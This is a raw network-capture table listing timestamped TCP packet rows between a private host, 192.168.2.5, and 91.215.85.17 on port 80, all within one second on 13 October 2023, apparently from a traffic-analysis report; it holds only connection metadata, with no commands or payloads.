Oct 13, 2023 15:20:56.896255016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896375895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896481037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896524906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.896554947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896598101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.896630049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896699905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896760941 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896811008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.896831036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896862030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896915913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.896949053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896997929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.896996975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897016048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897108078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897159100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897172928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897218943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897247076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897314072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897391081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897440910 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897496939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897514105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897543907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897635937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897681952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897691011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897742987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897851944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897867918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897885084 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.897898912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897933960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.897957087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898017883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898062944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.898077965 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898125887 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.898149967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898224115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898325920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898375988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.898410082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898461103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.898499966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898572922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898667097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898715973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.898767948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898816109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.898853064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.898950100 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899014950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899071932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899101019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899153948 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899189949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899276972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899363041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899411917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899434090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899475098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899492025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899581909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899650097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899698019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899712086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899759054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899796009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899846077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899909973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.899975061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.899993896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900026083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900037050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900109053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900173903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900221109 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900259018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900304079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900415897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900480986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900556087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900599003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900599957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900638103 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900645018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900702953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900754929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900799990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900826931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900872946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.900878906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900912046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.900995016 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901038885 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901055098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901087046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901098967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901137114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901215076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901252985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901259899 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901289940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901328087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901426077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901494026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901510954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901540995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901576042 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901583910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901622057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901695013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901741028 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901750088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901768923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901793957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901849031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901905060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.901948929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.901985884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902031898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.902059078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902076960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902158022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902200937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.902373075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902421951 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.902452946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902486086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902530909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.902611017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902678013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902740955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902779102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902786016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.902817011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.902825117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902904987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.902996063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903038979 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903045893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903091908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903131008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903148890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903182030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903213978 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903275013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903356075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903405905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903419971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903454065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903466940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903500080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903510094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903554916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903557062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903606892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903647900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903666019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903692961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903748989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903780937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903801918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903809071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903857946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903857946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903897047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903914928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.903958082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.903968096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904012918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904053926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904095888 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904114008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904155970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904170990 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904211998 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904227018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904269934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904298067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904340982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904381037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904423952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904459953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904503107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904515028 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904560089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904598951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904642105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904684067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904728889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904747009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904766083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904798031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904798031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904824972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904866934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904889107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904932022 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.904951096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.904994965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905010939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905030012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905080080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905117989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905160904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905174971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905220985 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905245066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905287981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905303955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905337095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905349970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905381918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905388117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905433893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905472040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905515909 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905553102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905595064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905605078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905622959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905647039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905682087 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905708075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905761003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905807018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905822039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905854940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905867100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905900002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905906916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.905950069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.905987978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906029940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906054020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906097889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906111956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906160116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906189919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906228065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906239986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906270981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906277895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906322956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906359911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906404018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906590939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906636000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906668901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906702995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906713963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906742096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906800985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906817913 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906845093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906857967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906864882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906898975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906934023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.906976938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.906990051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907032967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907064915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907107115 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907126904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907160997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907171011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907202005 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907242060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907296896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907335043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907382965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907386065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907404900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907432079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907465935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907490015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907608986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907656908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907670021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907727003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907740116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907758951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907784939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907819986 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907907009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907937050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.907957077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.907990932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908014059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908056974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908078909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908127069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908149958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908196926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908269882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908318996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908370972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908420086 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908458948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908504963 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908530951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908577919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908618927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908667088 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908706903 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908755064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908785105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908802986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908828974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908864021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.908888102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908931971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.908977032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.909004927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909049988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.909077883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909130096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.909323931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909384966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909415960 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909431934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.909462929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.909499884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909524918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.909549952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.909584045 CEST	49721	80	192.168.2.5	91.215.85.17
